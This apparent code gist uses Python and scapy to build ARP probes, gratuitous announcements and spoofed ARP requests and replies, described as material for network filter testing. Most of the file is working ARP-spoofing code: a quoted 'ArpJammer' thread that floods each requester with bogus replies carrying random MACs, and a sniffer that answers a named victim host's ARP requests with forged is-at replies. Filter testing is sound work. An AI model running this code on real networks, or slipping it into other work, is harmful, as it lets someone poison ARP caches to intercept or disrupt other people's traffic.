xcke
3/21/2018 - 9:10 PM

Some quick-n-dirty sample code and functions to manipulate ARP packets (for network filter testing).


from scapy.all import *


# change this to your test machine's MAC address
# (used as the ARP hwsrc by every packet builder below, so it is the
# hardware address the filter under test sees as the sender)
SELF_MAC = '00:0c:29:67:22:c2'

# Ethernet broadcast address; the default Ether dst for the request builders
BCAST_MAC = 'ff:ff:ff:ff:ff:ff'


def create_ARP_request_probe(ipaddr_to_probe):
    """Build (but do not send) an ARP probe for ``ipaddr_to_probe``.

    The request uses ``psrc='0.0.0.0'`` so the sender advertises no IP of its
    own, ``hwsrc=SELF_MAC``, and is wrapped in a broadcast Ethernet frame.
    Returns the Ether/ARP packet; the caller decides whether to sendp() it.
    """
    return Ether(dst=BCAST_MAC) / ARP(
        psrc='0.0.0.0',
        hwsrc=SELF_MAC,
        pdst=ipaddr_to_probe,
    )


def create_ARP_request_gratuitous(ipaddr_to_broadcast):
    """Build (but do not send) a gratuitous ARP request for ``ipaddr_to_broadcast``.

    Sender and target IP are both ``ipaddr_to_broadcast`` and the sender MAC is
    SELF_MAC, i.e. the frame announces that this host holds that address. The
    Ethernet destination is broadcast. Returns the Ether/ARP packet.
    """
    frame = Ether(dst=BCAST_MAC)
    announce = ARP(
        psrc=ipaddr_to_broadcast,
        hwsrc=SELF_MAC,
        pdst=ipaddr_to_broadcast,
    )
    return frame / announce


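def create_ARP_request_directed(
        ipaddr_target,          # the target machine's actual IP address
        ipaddr_src_spoof,       # the sender IP the target will see in the request; may differ from this host's real IP
        eth_dest=BCAST_MAC):    # leave as broadcast, or set to the target machine's actual MAC address
    """Build (but do not send) an ARP who-has for ``ipaddr_target`` with a chosen sender IP.

    The ARP sender IP is ``ipaddr_src_spoof`` and the sender MAC is SELF_MAC;
    ``eth_dest`` selects broadcast (default) or a unicast Ethernet destination.
    Returns the Ether/ARP packet.

    Fix: the original referenced ``self_mac``, which is not defined anywhere in
    this file (the constant is SELF_MAC), so every call raised NameError.
    """
    arp = ARP(
        psrc=ipaddr_src_spoof,
        hwsrc=SELF_MAC,
        pdst=ipaddr_target,
        op=1,  # who-has; this is scapy's default, spelled out to match the op=2 builders below
    )
    eth = Ether(dst=eth_dest)
    return eth / arp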


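def create_ARP_response_gratuitous(ipaddr_to_advertise):
    """Build (but do not send) a gratuitous ARP reply (op 2, is-at) for ``ipaddr_to_advertise``.

    Like create_ARP_request_gratuitous, sender and target IP are both
    ``ipaddr_to_advertise`` and the frame is broadcast; here ``hwdst`` is also
    SELF_MAC and the opcode is 2. Returns the Ether/ARP packet.

    Fix: the original referenced ``self_mac`` and ``broadcast_mac``, neither of
    which is defined in this file (the constants are SELF_MAC / BCAST_MAC), so
    every call raised NameError.
    """
    arp = ARP(
        psrc=ipaddr_to_advertise,
        hwsrc=SELF_MAC,
        pdst=ipaddr_to_advertise,
        hwdst=SELF_MAC,
        op=2,  # is-at
    )
    eth = Ether(dst=BCAST_MAC)
    return eth / arp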


def create_ARP_response_directed(
        ipaddr_to_spoof,    # the IP address claimed in the ARP reply
        ipaddr_target,      # the target machine's real IP address
        mac_target):        # the target machine's real MAC address
    """Build (but do not send) an unsolicited unicast ARP reply (op 2, is-at) to one machine.

    The reply states that ``ipaddr_to_spoof`` is at SELF_MAC and is addressed,
    both in the ARP body and in the Ethernet header, to ``ipaddr_target`` /
    ``mac_target``. Returns the Ether/ARP packet; send_spoofed_ARP_response
    below uses it to answer a captured request.
    """
    reply = ARP(
        op=2,
        psrc=ipaddr_to_spoof,
        hwsrc=SELF_MAC,
        pdst=ipaddr_target,
        hwdst=mac_target,
    )
    return Ether(dst=mac_target) / reply


## !!! HOW TO SNIFF ARP PACKETS (and possibly respond with SPOOFS) !!! ##

## First, some sample code (taken from http://www.craigdodd.co.uk/posts/exploiting-arp-with-python) ##

import threading
import time
 
from scapy.all import *
 
class ArpJammer(threading.Thread):
    """Thread that answers one captured ARP request with repeated bogus is-at replies.

    Sample code quoted verbatim from the craigdodd.co.uk post linked above; the
    code is left as-is and only annotated. Traffic it produces: 10 unicast ARP
    replies (op 2) to the requester, two seconds apart, each claiming the
    requested IP with a random hardware address. That is the pattern an
    ARP-inspection filter under test should reject -- a reply whose hwsrc does
    not match any known IP/MAC binding for the claimed address.
    """
    def __init__(self, pkt):
        # pkt: the sniffed frame holding the ARP request being answered
        self.pkt = pkt
        # number of replies run() sends; fixed at 10 in this sample
        self.pkt_count = 10
        # NOTE: attributes are assigned before Thread.__init__ runs; it works,
        # but the conventional order is super().__init__() first.
        super(ArpJammer, self).__init__()

    def run(self):
        a = ARP()
        a.op = 2                                 # is-at (reply)
        a.psrc = self.pkt[ARP].pdst              # claim the IP the requester asked for
        a.hwsrc = RandMAC()                      # random hardware address for that claim
        a.pdst = self.pkt[ARP].psrc              # addressed back to the requester's IP ...
        a.hwdst = self.pkt[ARP].hwsrc            # ... and to its MAC
        p = Ether(dst=self.pkt[ARP].hwsrc) / a   # unicast frame to the requester
        # NOTE(review): RandMAC() is a scapy volatile value; whether each sendp()
        # re-draws it or all replies share one MAC depends on when scapy builds
        # the packet -- confirm before relying on either behaviour.
        for i in range(self.pkt_count):
            sendp(p)
            time.sleep(2)
 
def arp_monitor_callback(pkt):
    """sniff() callback from the sample: start an ArpJammer for every ARP who-has (op 1).

    Frames without an ARP layer, and ARP replies, are ignored.
    """
    if ARP not in pkt:
        return
    if pkt[ARP].op != 1:
        return
    ArpJammer(pkt).start()
 
def sniff_with_jammer():
    """Capture ARP frames (BPF filter 'arp', nothing stored) and pass each to arp_monitor_callback."""
    capture_opts = dict(filter='arp', prn=arp_monitor_callback, store=0)
    sniff(**capture_opts)

## End sample ##


# lab host whose ARP requests arp_monitor_spoofer answers; change for your test setup
VICTIM_IPADDR = '192.168.253.149'

def send_spoofed_ARP_response(pkt):
    """Answer the ARP request in ``pkt`` with a unicast is-at reply and send it at once.

    The reply, built by create_ARP_response_directed, claims the IP the
    requester asked for (``pdst``) and is addressed to the requester's own
    IP and MAC (``psrc`` / ``hwsrc``).
    """
    request = pkt[ARP]
    reply = create_ARP_response_directed(
        ipaddr_to_spoof=request.pdst,
        ipaddr_target=request.psrc,
        mac_target=request.hwsrc,
    )
    sendp(reply)

def arp_monitor_spoofer(pkt):
    """sniff() callback: reply only to ARP who-has (op 1) requests sent from VICTIM_IPADDR."""
    is_request = ARP in pkt and pkt[ARP].op == 1
    if is_request and pkt[ARP].psrc == VICTIM_IPADDR:
        send_spoofed_ARP_response(pkt)

def sniff_with_spoofer():
    """Capture ARP frames (BPF filter 'arp', nothing stored) and pass each to arp_monitor_spoofer."""
    capture_opts = dict(filter='arp', prn=arp_monitor_spoofer, store=0)
    sniff(**capture_opts)